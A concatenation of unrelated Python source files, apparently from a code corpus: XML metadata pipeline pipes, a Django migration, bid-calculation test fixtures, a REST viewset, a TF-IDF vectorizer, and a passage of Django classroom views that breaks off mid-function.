pubdate = ET.Element('publicationDate')
pubdate.text = raw.publication_date
xml.find('./record').append(pubdate)
return data
class XMLArticleMetaStartPagePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.start_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
startpage = ET.Element('startPage')
startpage.text = raw.start_page
xml.find('./record').append(startpage)
return data
class XMLArticleMetaEndPagePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.end_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
endpage = ET.Element('endPage')
endpage.text = raw.end_page
xml.find('./record').append(endpage)
return data
class XMLArticleMetaVolumePipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.issue.volume:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
volume = ET.Element('volume')
volume.text = raw.issue.volume
xml.find('./record').append(volume)
return data
class XMLArticleMetaIssuePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
label_volume = raw.issue.volume.replace('ahead', '0') if raw.issue.volume else '0'
label_issue = raw.issue.number.replace('ahead', '0') if raw.issue.number else '0'
vol = ET.Element('volume')
vol.text = label_volume.strip()
label_suppl_issue = ' suppl %s' % raw.issue.supplement_number if raw.issue.supplement_number else ''
if label_suppl_issue:
label_issue += label_suppl_issue
label_suppl_volume = ' suppl %s' % raw.issue.supplement_volume if raw.issue.supplement_volume else ''
if label_suppl_volume:
label_issue += label_suppl_volume
label_issue = SUPPLBEG_REGEX.sub('', label_issue)
label_issue = SUPPLEND_REGEX.sub('', label_issue)
if label_issue.strip():
issue = ET.Element('issue')
issue.text = label_issue.strip()
xml.find('./record').append(issue)
return data
class XMLArticleMetaDocumentTypePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
documenttype = ET.Element('documentType')
documenttype.text = raw.document_type
xml.find('./record').append(documenttype)
return data
class XMLArticleMetaFullTextUrlPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.html_url:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
url = ET.Element('fullTextUrl')
url.set('format', 'html')
url.text = raw.html_url(language='en')
xml.find('./record').append(url)
return data
class XMLArticleMetaAbstractsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.original_abstract() and not raw.translated_abstracts():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articlemeta = xml.find('./record')
if raw.original_abstract():
abstract = ET.Element('abstract')
abstract.set('language', ISO6392T_TO_ISO6392B.get(raw.original_language(), raw.original_language()))
abstract.text = raw.original_abstract()
articlemeta.append(abstract)
if raw.translated_abstracts():
for lang, text in raw.translated_abstracts().items():
abstract = ET.Element('abstract')
abstract.set('language', ISO6392T_TO_ISO6392B.get(lang, lang))
abstract.text = text
articlemeta.append(abstract)
return data
class XMLArticleMetaKeywordsPipe(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.keywords():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
articlemeta = xml.find('./record')
if raw.keywords():
for lang, keywords in raw.keywords().items():
kwdgroup = ET.Element('keywords')
kwdgroup.set('language', ISO6392T_TO_ISO6392B.get(lang, lang))
for keyword in keywords:
kwd = ET.Element('keyword')
kwd.text = keyword
kwdgroup.append(kwd)
articlemeta.append(kwdgroup)
return data
class XMLClosePipe(plumber.Pipe):
def transform(self, data):
raw, xml = data
data = ET.tostring(xml, encoding="utf-8", method="xml")
return data
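# A minimal sketch of how these pipes might be chained, assuming plumber.Pipeline
# simply feeds each pipe's transform() output into the next pipe (the exact pipe
# order and the Pipeline API usage here are assumptions):
#
#     ppl = plumber.Pipeline(SetupArticlePipe(), XMLArticlePipe(),
#                            XMLJournalMetaJournalTitlePipe(), XMLJournalMetaISSNPipe(),
#                            XMLArticleMetaTitlePipe(), XMLClosePipe())
#     xml_bytes = next(ppl.run([raw_article]))   # raw_article: a hypothetical article object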
| python |
# Generated by Django 3.1.2 on 2020-10-12 22:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dominios', '0002_dominio_data_updated'),
]
operations = [
migrations.AddField(
model_name='dominio',
name='uid_anterior',
field=models.IntegerField(default=0, help_text='to be deleted after migration'),
),
]
| python |
# -*- coding: utf-8 -*-
from datetime import datetime
DISCOUNT_RATE = 0.125
BASE_BID = {'NBUdiscountRate': DISCOUNT_RATE,
'annualCostsReduction': [92.47] + [250] * 20,
'yearlyPaymentsPercentage': 0.70,
'contractDuration': {'years': 2, 'days': 10},
'announcementDate': datetime(2017, 8, 18)}
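# The fixtures below appear to exercise an NPV-style calculation: the annualCostsReduction
# cash flows are discounted at NBUdiscountRate over contractDuration and split between
# contract payments (yearlyPaymentsPercentage) and the remaining performance amount;
# 'amountContract' and 'amountPerformance' hold the pre-computed expected results per input.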
CONTRACT_DURATION = {
'input': [
{'years': 0, 'days': 0}, {'years': 0, 'days': 1},
{'years': 0, 'days': 8}, {'years': 0, 'days': 31},
{'years': 0, 'days': 91}, {'years': 0, 'days': 92},
{'years': 0, 'days': 180}, {'years': 0, 'days': 182},
{'years': 0, 'days': 184}, {'years': 0, 'days': 256},
{'years': 0, 'days': 360}, {'years': 0, 'days': 361},
{'years': 0, 'days': 362}, {'years': 0, 'days': 363},
{'years': 0, 'days': 364}, {'years': 1, 'days': 0},
{'years': 2, 'days': 1}, {'years': 1, 'days': 8},
{'years': 2, 'days': 31},{'years': 1, 'days': 91},
{'years': 2, 'days': 92}, {'years': 1, 'days': 180},
{'years': 2, 'days': 182}, {'years': 1, 'days': 184},
{'years': 2, 'days': 256}, {'years': 1, 'days': 360},
{'years': 2, 'days': 361}, {'years': 1, 'days': 362},
{'years': 2, 'days': 363}, {'years': 1, 'days': 364},
{'years': 3, 'days': 0}, {'years': 7, 'days': 1},
{'years': 3, 'days': 8}, {'years': 8, 'days': 31},
{'years': 4, 'days': 91}, {'years': 9, 'days': 92},
{'years': 5, 'days': 180}, {'years': 10, 'days': 182},
{'years': 6, 'days': 184}, {'years': 11, 'days': 256},
{'years': 7, 'days': 360}, {'years': 12, 'days': 361},
{'years': 8, 'days': 362}, {'years': 13, 'days': 363},
{'years': 9, 'days': 364}, {'years': 10, 'days': 0},
{'years': 10, 'days': 1}, {'years': 11, 'days': 8},
{'years': 14, 'days': 30},{'years': 14, 'days': 31},
{'years': 14, 'days': 90}, {'years': 14, 'days': 91},
{'years': 14, 'days': 92}, {'years': 14, 'days': 180},
{'years': 14, 'days': 181}, {'years': 14, 'days': 182},
{'years': 14, 'days': 361}, {'years': 14, 'days': 362},
{'years': 14, 'days': 363}, {'years': 14, 'days': 364},
{'years': 15, 'days': 0}
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '1810.95435405817'},
{'amountContract': '0.47947407407',
'amountPerformance': '1810.49606787280'},
{'amountContract': '3.83579259259',
'amountPerformance': '1807.28806457523'},
{'amountContract': '14.86369629630',
'amountPerformance': '1796.74748231179'},
{'amountContract': '43.63214074074',
'amountPerformance': '1769.25031118977'},
{'amountContract': '44.11161481481',
'amountPerformance': '1768.79202500440'},
{'amountContract': '86.30434246575',
'amountPerformance': '1730.75511346897'},
{'amountContract': '87.26324657534',
'amountPerformance': '1729.94041988832'},
{'amountContract': '88.22215068493',
'amountPerformance': '1729.12572630767'},
{'amountContract': '122.74269863014',
'amountPerformance': '1699.79675740423'},
{'amountContract': '172.60571232877',
'amountPerformance': '1657.43269121038'},
{'amountContract': '173.08516438356',
'amountPerformance': '1657.02534442005'},
{'amountContract': '173.56461643836',
'amountPerformance': '1656.61799762973'},
{'amountContract': '174.04406849315',
'amountPerformance': '1656.21065083940'},
{'amountContract': '174.52352054795',
'amountPerformance': '1655.80330404908'},
{'amountContract': '175.00297260274',
'amountPerformance': '1655.39595725875'},
{'amountContract': '350.48242465753',
'amountPerformance': '1516.76226628463'},
{'amountContract': '178.83858904110',
'amountPerformance': '1652.13718293615'},
{'amountContract': '364.86598630137',
'amountPerformance': '1505.89968520929'},
{'amountContract': '218.63310958904',
'amountPerformance': '1618.32739933913'},
{'amountContract': '394.11256164384',
'amountPerformance': '1483.81243702275'},
{'amountContract': '261.30434246575',
'amountPerformance': '1584.11026895179'},
{'amountContract': '437.26324657534',
'amountPerformance': '1453.11558753945'},
{'amountContract': '263.22215068493',
'amountPerformance': '1582.66192480841'},
{'amountContract': '472.74269863014',
'amountPerformance': '1429.29837273721'},
{'amountContract': '347.60571232877',
'amountPerformance': '1518.93478249970'},
{'amountContract': '523.08516438356',
'amountPerformance': '1395.50367605835'},
{'amountContract': '348.56461643836',
'amountPerformance': '1518.21061042801'},
{'amountContract': '524.04406849315',
'amountPerformance': '1394.85996755018'},
{'amountContract': '349.52352054795',
'amountPerformance': '1517.48643835632'},
{'amountContract': '525.00297260274',
'amountPerformance': '1394.21625904202'},
{'amountContract': '1225.48242465753',
'amountPerformance': '1024.59792121607'},
{'amountContract': '528.83858904110',
'amountPerformance': '1391.64142500934'},
{'amountContract': '1414.86598630137',
'amountPerformance': '951.05679958049'},
{'amountContract': '743.63310958904',
'amountPerformance': '1258.93018757522'},
{'amountContract': '1619.11256164384',
'amountPerformance': '881.36067351043'},
{'amountContract': '961.30434246575',
'amountPerformance': '1143.34874877515'},
{'amountContract': '1837.26324657534',
'amountPerformance': '817.12906555064'},
{'amountContract': '1138.22215068493',
'amountPerformance': '1061.16755000753'},
{'amountContract': '2047.74269863014',
'amountPerformance': '763.74700436815'},
{'amountContract': '1397.60571232877',
'amountPerformance': '957.48662442295'},
{'amountContract': '2273.08516438356',
'amountPerformance': '714.14055865311'},
{'amountContract': '1573.56461643836',
'amountPerformance': '896.44297869644'},
{'amountContract': '2449.04406849315',
'amountPerformance': '680.27668462186'},
{'amountContract': '1749.52352054795',
'amountPerformance': '842.21724051892'},
{'amountContract': '1750.00297260274',
'amountPerformance': '842.07611953472'},
{'amountContract': '1750.48242465753',
'amountPerformance': '841.93499855052'},
{'amountContract': '1928.83858904110',
'amountPerformance': '793.16985845594'},
{'amountContract': '2464.38653424658',
'amountPerformance': '677.45744827975'},
{'amountContract': '2464.86598630137',
'amountPerformance': '677.36934714405'},
{'amountContract': '2493.15365753425',
'amountPerformance': '672.17138013828'},
{'amountContract': '2493.63310958904',
'amountPerformance': '672.08327900259'},
{'amountContract': '2494.11256164384',
'amountPerformance': '671.99517786690'},
{'amountContract': '2536.30434246575',
'amountPerformance': '664.68278360454'},
{'amountContract': '2536.78379452055',
'amountPerformance': '664.60447148393'},
{'amountContract': '2537.26324657534',
'amountPerformance': '664.52615936331'},
{'amountContract': '2623.08516438356',
'amountPerformance': '650.50828977336'},
{'amountContract': '2623.56461643836',
'amountPerformance': '650.42997765275'},
{'amountContract': '2624.04406849315',
'amountPerformance': '650.35166553213'},
{'amountContract': '2624.52352054795',
'amountPerformance': '650.27335341152'},
{'amountContract': '2625.00297260274',
'amountPerformance': '650.19504129090'}
]
}
ANNOUNCEMENT_DATE = {
'input': [
datetime(2017, 5, 2), datetime(2017, 5, 3), datetime(2017, 5, 4),
datetime(2017, 5, 5), datetime(2017, 5, 6), datetime(2017, 5, 7),
datetime(2017, 5, 8), datetime(2017, 5, 9), datetime(2017, 5, 10),
datetime(2017, 5, 11), datetime(2017, 12, 30), datetime(2018, 1, 1),
datetime(2018, 1, 31), datetime(2018, 2, 1), datetime(2018, 12, 30),
],
'expected_results': [
{'amountContract': '303.01667123288',
'amountPerformance': '1493.11261864549'},
{'amountContract': '303.49612328767',
'amountPerformance': '1493.29714530232'},
{'amountContract': '303.97557534247',
'amountPerformance': '1493.48174786072'},
{'amountContract': '304.45502739726',
'amountPerformance': '1493.66642643300'},
{'amountContract': '304.93447945205',
'amountPerformance': '1493.85118113158'},
{'amountContract': '305.41393150685',
'amountPerformance': '1494.03601206895'},
{'amountContract': '305.89338356164',
'amountPerformance': '1494.22091935769'},
{'amountContract': '306.37283561644',
'amountPerformance': '1494.40590311049'},
{'amountContract': '306.85228767123',
'amountPerformance': '1494.59096344011'},
{'amountContract': '307.33173972603',
'amountPerformance': '1494.77610045941'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
{'amountContract': '245.00297260274',
'amountPerformance': '1471.31191860622'},
{'amountContract': '259.38653424658',
'amountPerformance': '1476.62410121389'},
{'amountContract': '259.86598630137',
'amountPerformance': '1476.80218008027'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
]
}
PAYMENTS_PERCENTAGE = {
'input': [
0.0000, 0.0001, 0.0009, 0.0010, 0.0100, 0.1000, 0.0499, 0.0500, 0.4900,
0.4999, 0.5000, 0.7100, 0.7200, 0.7300, 0.7400, 0.7500, 0.7600, 0.7700,
0.7800, 0.7900, 0.8000, 0.8900, 0.8990, 0.8999, 0.9000
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '1810.95435405817'},
{'amountContract': '0.05068535616',
'amountPerformance': '1810.91186107787'},
{'amountContract': '0.45616820548',
'amountPerformance': '1810.57191723547'},
{'amountContract': '0.50685356164',
'amountPerformance': '1810.52942425517'},
{'amountContract': '5.06853561644',
'amountPerformance': '1806.70505602822'},
{'amountContract': '50.68535616438',
'amountPerformance': '1768.46137375872'},
{'amountContract': '25.29199272603',
'amountPerformance': '1789.75035688874'},
{'amountContract': '25.34267808219',
'amountPerformance': '1789.70786390844'},
{'amountContract': '248.35824520548',
'amountPerformance': '1602.73875059087'},
{'amountContract': '253.37609546575',
'amountPerformance': '1598.53194554123'},
{'amountContract': '253.42678082192',
'amountPerformance': '1598.48945256093'},
{'amountContract': '359.86602876712',
'amountPerformance': '1509.25419393209'},
{'amountContract': '364.93456438356',
'amountPerformance': '1505.00489590214'},
{'amountContract': '370.00310000000',
'amountPerformance': '1500.75559787220'},
{'amountContract': '375.07163561644',
'amountPerformance': '1496.50629984225'},
{'amountContract': '380.14017123288',
'amountPerformance': '1492.25700181231'},
{'amountContract': '385.20870684932',
'amountPerformance': '1488.00770378236'},
{'amountContract': '390.27724246575',
'amountPerformance': '1483.75840575242'},
{'amountContract': '395.34577808219',
'amountPerformance': '1479.50910772247'},
{'amountContract': '400.41431369863',
'amountPerformance': '1475.25980969253'},
{'amountContract': '405.48284931507',
'amountPerformance': '1471.01051166258'},
{'amountContract': '451.09966986301',
'amountPerformance': '1432.76682939308'},
{'amountContract': '455.66135191781',
'amountPerformance': '1428.94246116613'},
{'amountContract': '456.11752012329',
'amountPerformance': '1428.56002434343'},
{'amountContract': '456.16820547945',
'amountPerformance': '1428.51753136313'},
]
}
DISCOUNT_RATES = {
'input': [
0.0000, 0.0001, 0.0010, 0.0100, 0.1000, 1.0000, 0.1249, 0.1250, 0.1300,
0.1500, 0.1800, 0.2000, 0.2200, 0.3000, 0.4000, 0.5000, 0.6000, 0.7000,
0.8000, 0.9000, 0.9900, 0.9909, 0.9990, 0.9999
],
'expected_results': [
{'amountContract': '354.79749315068',
'amountPerformance': '4645.20675342466'},
{'amountContract': '354.79749315068',
'amountPerformance': '4640.02004460226'},
{'amountContract': '354.79749315068',
'amountPerformance': '4593.68225030323'},
{'amountContract': '354.79749315068',
'amountPerformance': '4162.36042333301'},
{'amountContract': '354.79749315068',
'amountPerformance': '1821.63775269194'},
{'amountContract': '354.79749315068',
'amountPerformance': '117.87571646511'},
{'amountContract': '354.79749315068',
'amountPerformance': '1514.57663165387'},
{'amountContract': '354.79749315068',
'amountPerformance': '1513.50349196203'},
{'amountContract': '354.79749315068',
'amountPerformance': '1461.26832468564'},
{'amountContract': '354.79749315068',
'amountPerformance': '1277.36248402751'},
{'amountContract': '354.79749315068',
'amountPerformance': '1061.29444236423'},
{'amountContract': '354.79749315068',
'amountPerformance': '947.18616001753'},
{'amountContract': '354.79749315068',
'amountPerformance': '851.26540354660'},
{'amountContract': '354.79749315068',
'amountPerformance': '588.29996204648'},
{'amountContract': '354.79749315068',
'amountPerformance': '407.85685451746'},
{'amountContract': '354.79749315068',
'amountPerformance': '303.61355861378'},
{'amountContract': '354.79749315068',
'amountPerformance': '237.36786431275'},
{'amountContract': '354.79749315068',
'amountPerformance': '192.32300937991'},
{'amountContract': '354.79749315068',
'amountPerformance': '160.12224139859'},
{'amountContract': '354.79749315068',
'amountPerformance': '136.19991118181'},
{'amountContract': '354.79749315068',
'amountPerformance': '119.50923564960'},
{'amountContract': '354.79749315068',
'amountPerformance': '119.36059287924'},
{'amountContract': '354.79749315068',
'amountPerformance': '118.03729764291'},
{'amountContract': '354.79749315068',
'amountPerformance': '117.89185707063'},
]
}
ANNUAL_COSTS_REDUCTION = {
'input': [
[0] * 20 + [0.01],
[0] * 18 + [0.01] * 3,
[0] * 11 + [0.01] * 10,
[0] * 3 + [0.01] * 18,
[0] * 2 + [0.01] * 19,
[0] + [0.01] * 20,
[0.01] * 21,
[0] * 20 + [1],
[0] * 18 + [1] * 3,
[0] * 11 + [1] * 10,
[0] * 3 + [1] * 18,
[0] * 2 + [1] * 19,
[0] + [1] * 20,
[1] * 21,
[i * 100 for i in (range(1, 22))],
[2200 - i * 100 for i in (range(1, 22))],
[123456789] * 21
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '0.00059563606'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.00276250500'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.01598505603'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.05285465322'},
{'amountContract': '0.00460273973',
'amountPerformance': '0.05693070745'},
{'amountContract': '0.01160273973',
'amountPerformance': '0.05947953451'},
{'amountContract': '0.01860273973',
'amountPerformance': '0.06234696495'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.05956360564'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.27625049981'},
{'amountContract': '0.00000000000',
'amountPerformance': '1.59850560258'},
{'amountContract': '0.00000000000',
'amountPerformance': '5.28546532151'},
{'amountContract': '0.46027397260',
'amountPerformance': '5.69307074472'},
{'amountContract': '1.16027397260',
'amountPerformance': '5.94795345066'},
{'amountContract': '1.86027397260',
'amountPerformance': '6.23469649485'},
{'amountContract': '348.08219178082',
'amountPerformance': '5211.30198080864'},
{'amountContract': '3744.52054794521',
'amountPerformance': '8505.03030786802'},
{'amountContract': '229663451.31780821085',
'amountPerformance': '769715609.64411020279'}
]
}
BIDS = {
'input': [
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.0000,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [0] * 20 + [0.01]
},
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 20 + [10000]
},
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 135},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 11 + [10000] * 10
},
{
'contractDuration': {'years': 10, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 11 + [10000] * 10
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2017, 12, 30)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2017, 12, 31)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2018, 1, 1)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [0] + [250] * 20,
'announcementDate': datetime(2018, 12, 31)
},
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '0.00630136986'},
{'amountContract': '0.00000000000',
'amountPerformance': '595.63605641337'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '24.65479452055',
'amountPerformance': '18921.17970907397'},
{'amountContract': '0.00000000000',
'amountPerformance': '15985.05602575644'},
{'amountContract': '24.65479452055',
'amountPerformance': '15978.60549756960'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
{'amountContract': '354.79452054795',
'amountPerformance': '1513.14383477073'},
{'amountContract': '245.00297260274',
'amountPerformance': '1471.31191860622'},
{'amountContract': '354.79452054795',
'amountPerformance': '1513.14383477073'},
]
}
| python |
import copy
from rest_framework import viewsets
from rest_framework.decorators import api_view
from rest_framework.response import Response
from dashboard.models import Place
from api_v1.containers.place.serializers import PlaceSerializer
from api_v1.serializers import BatchRequestSerializer
class PlaceViewSet(viewsets.ModelViewSet):
serializer_class = PlaceSerializer
http_method_names = ['get', 'head']
def get_queryset(self):
return_places = Place.objects.all()
if(self.request.GET.get('name')):
placeName = self.request.GET.get('name')
return_place = return_places.filter(name__iexact=placeName).order_by('name').distinct('name')
return return_place
        if(self.request.GET.get('id')):
            placeId = self.request.GET.get('id')
            return_place = return_places.filter(id=placeId)
            return return_place
return return_places
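# Batch lookup endpoint. Based on the 'ids' field read from BatchRequestSerializer below,
# a request body of the form {"ids": [1, 2, 3]} returns the matching places (payload shape assumed).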
@api_view(['POST'])
def request_multiple_places(request):
data = copy.deepcopy(request.data)
request_serializer = BatchRequestSerializer(data=data)
request_serializer.is_valid(raise_exception=True)
query_set = Place.objects.filter(pk__in=request_serializer.data['ids']).distinct('id')
response_serializer = PlaceSerializer(query_set, many=True)
return Response(response_serializer.data)
| python |
import re
import string
import numpy as np
from math import log
from typing import List
from collections import Counter
from .document import Document
class CountVectorizer:
@staticmethod
def split_iter(document_content: str):
"""
        Splits the document into words and returns them as a generator.
Args:
document_content: Cleaned document content.
Returns: Generator of document terms.
"""
return (x.group(0) for x in re.finditer(r"[A-Za-z0-9]+", document_content))
def clean_document(self, document: str) -> str:
"""
Cleans text from any punctuation characters and lowers it.
Args:
document: Text to be cleaned.
        Returns: Lowercased string without punctuation signs.
"""
return document.lower().translate(str.maketrans("", "", string.punctuation))
def count_term_freq(self, document: Document) -> dict:
"""
Counts term frequency inside document.
Args:
document: Loaded document object.
Returns: Counter with term: count items.
"""
document = self.clean_document(document.content)
tokens = self.split_iter(document)
return Counter(tokens)
def vectorize(self, document: Document) -> np.ndarray:
"""
        Counts document term frequency and returns it as a vector.
Args:
document: Loaded document object.
Returns: Numpy array with term frequency values.
"""
return np.array(list(self.count_term_freq(document).values()))
class TfidfVectorizer(CountVectorizer):
def calculate_tfidf(self, term_freq: int, inverse_doc_freq: float) -> float:
"""
Calculates term frequency - inverse document frequency.
Args:
term_freq: Term frequency.
inverse_doc_freq: Inverse document frequency.
Returns: Product of term and inverse document frequency (float).
"""
return term_freq * inverse_doc_freq
def calculate_inverse_doc_freq(self, doc_num: int, term_doc_freq: int) -> float:
"""
Calculates inverse document frequency.
Args:
doc_num: Number of documents.
            term_doc_freq: Number of term appearances in documents.
Returns: Inverse document frequency (float).
"""
return 0 if not term_doc_freq else log(doc_num / term_doc_freq)
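    # Worked example: with doc_num=10 and term_doc_freq=2 this returns
    # log(10 / 2) = log(5), approximately 1.609 (natural logarithm, since math.log is used).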
def count_term_doc_freq(self, term: str, document: Document) -> int:
"""
Returns number of appearances of term for given document.
Args:
term: String.
document: Loaded document object.
Returns: Number of appearances of term for given document.
"""
return self.count_term_freq(document).get(term, 0)
def vectorize(self, document: Document, comp_documents: List[Document]) -> np.ndarray:
"""
Calculates TFIDF for given documents and returns it as matrix (numpy array).
Args:
document: Loaded document.
comp_documents: List of loaded documents.
Returns: Matrix (numpy array) representing TFIDF.
"""
term_frequencies = self.count_term_freq(document)
doc_number = len(comp_documents)
term_docs_frequencies = dict()
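        # Every term's document frequency starts at 1 here, so the source document itself is
        # effectively counted (this also acts as +1 smoothing, keeping the IDF denominator nonzero).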
for comp_doc in comp_documents:
for term in term_frequencies.keys():
if term not in term_docs_frequencies:
term_docs_frequencies[term] = 1
term_docs_frequencies[term] += 1 if self.count_term_doc_freq(term, comp_doc) else 0
_tfidf = list()
for term in term_frequencies.keys():
term_freq = term_frequencies.get(term)
term_doc_freq = term_docs_frequencies.get(term)
inverse_term_freq = self.calculate_inverse_doc_freq(doc_number, term_doc_freq)
_tfidf.append(self.calculate_tfidf(term_freq, inverse_term_freq))
return np.array(_tfidf)
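# A hypothetical usage sketch (how Document instances are constructed is not shown here):
#
#     docs = [Document(...), Document(...), Document(...)]
#     vec = TfidfVectorizer().vectorize(docs[0], docs)   # one TF-IDF value per term of docs[0]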
| python |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render,redirect,get_object_or_404
from django.contrib.auth.models import User
from django.http import Http404,HttpResponse
from django.contrib import messages
from django.db.models import Q
from .forms import *
from .models import *
from .email import *
from .delete_notify import *
from .utils import *
from django.urls import reverse
import xlwt,datetime
from notifications.signals import notify
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt #checked
def home(request):
"""Landing Page"""
if request.user.is_authenticated:
return redirect(reverse('homepage'))
else:
if request.method=='POST':
name=request.POST.get('name')
email = request.POST.get('email')
message =f"{name} \n {email} \n {request.POST.get('message')} "
mail_subject = 'Contact us : Sent by ' + name
if(send_mail(mail_subject,message,'[email protected]',['[email protected]'])):
messages.add_message(request,messages.SUCCESS,'Your message sent successfully.')
else:
messages.add_message(request,messages.ERROR,"An Error while sending your message.\
Please try again or contact using given contact details.")
return render(request,'intro.html')
@login_required#checked
def homepage(request):
"""
    Create a classroom or join an existing one.
"""
user = request.user
if request.POST.get('join_key'):
join_key = request.POST.get('join_key')
try:
classroom = Classroom.objects.get(unique_id=join_key)
except Classroom.DoesNotExist:
messages.add_message(request, messages.WARNING,"No such classroom exists.")
return redirect(reverse('homepage'))
if classroom.members.all().filter(username=user.username).exists():
messages.add_message(request, messages.INFO,"You are already member of this class.")
return redirect(reverse('homepage'))
if classroom.need_permission:
classroom.pending_members.add(user)
messages.add_message(request, messages.SUCCESS,"Your request is sent.\
You can access classroom material when someone lets you in.")
user.profile.pending_invitations.add(classroom)
notify.send(sender=user,verb=f"{user.username} wants to join {classroom.class_name}",recipient=classroom.special_permissions.all(),
url=reverse('classroom_page',kwargs={
'unique_id':classroom.unique_id
}
))
else:
recipients = User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
url = reverse('profile',kwargs={'username':user.username})
notify.send(sender=user,recipient=recipients,verb=f"{request.user.username} has joined {classroom.class_name}",url= url)
classroom.members.add(user)
return redirect(reverse('homepage'))
#create classroom
if request.method=='POST':
createclassform = CreateclassForm(request.POST ,request.FILES)
if createclassform.is_valid():
classroom=createclassform.save(commit=False)
classroom.unique_id = unique_id()
classroom.created_by = request.user
classroom.save()
classroom.members.add(request.user)
classroom.special_permissions.add(request.user)
return redirect(reverse('homepage'))
else:
createclassform = CreateclassForm()
#queryset
params={
'createclassform':createclassform,
}
return render(request,'homepage.html',params)
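# Join flow used above: the key a user enters is matched against Classroom.unique_id;
# classrooms with need_permission=True queue the user in pending_members until an admin
# lets them in, otherwise the user is added to members immediately and existing members are notified.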
@login_required#checked
def admin_status(request,unique_id,username):
"""
Toggles admin status of users from a classroom
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin = classroom.special_permissions.filter(username=request.user.username).exists()
if admin:
check = classroom.special_permissions.filter(username = username).exists()
user = User.objects.get(username=username)
url = reverse('classroom_page',kwargs={ 'unique_id':unique_id})
if check:
if classroom.created_by == user:
messages.add_message(request,messages.WARNING,"This user have created\
this class. He can't be dropped")
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
classroom.special_permissions.remove(user)
notify.send(sender=request.user,recipient = user,verb=f"You are no longer admin of {classroom.class_name}",url=url)
else:
classroom.special_permissions.add(user)
notify.send(sender=request.user,recipient = user,verb=f"Now you are admin of {classroom.class_name}",url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
else:
raise Http404()
@login_required#checked
def classroom_page(request,unique_id):
"""
Classroom Setting Page.
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
pending_members = classroom.pending_members.all()
admins = classroom.special_permissions.all()
members = admins | classroom.members.all()
is_admin = classroom.special_permissions.filter(username = request.user.username).exists()
#classroom_update
if request.method=="POST":
form = CreateclassForm(request.POST,request.FILES,instance=classroom)
if form.is_valid():
form.save()
return redirect(reverse('subjects',kwargs={'unique_id':classroom.unique_id}))
else:
form = CreateclassForm(instance=classroom)
params={
'members':members.distinct(),
'admins':admins,
'pending_members':pending_members,
'classroom':classroom,
'is_admin':is_admin,
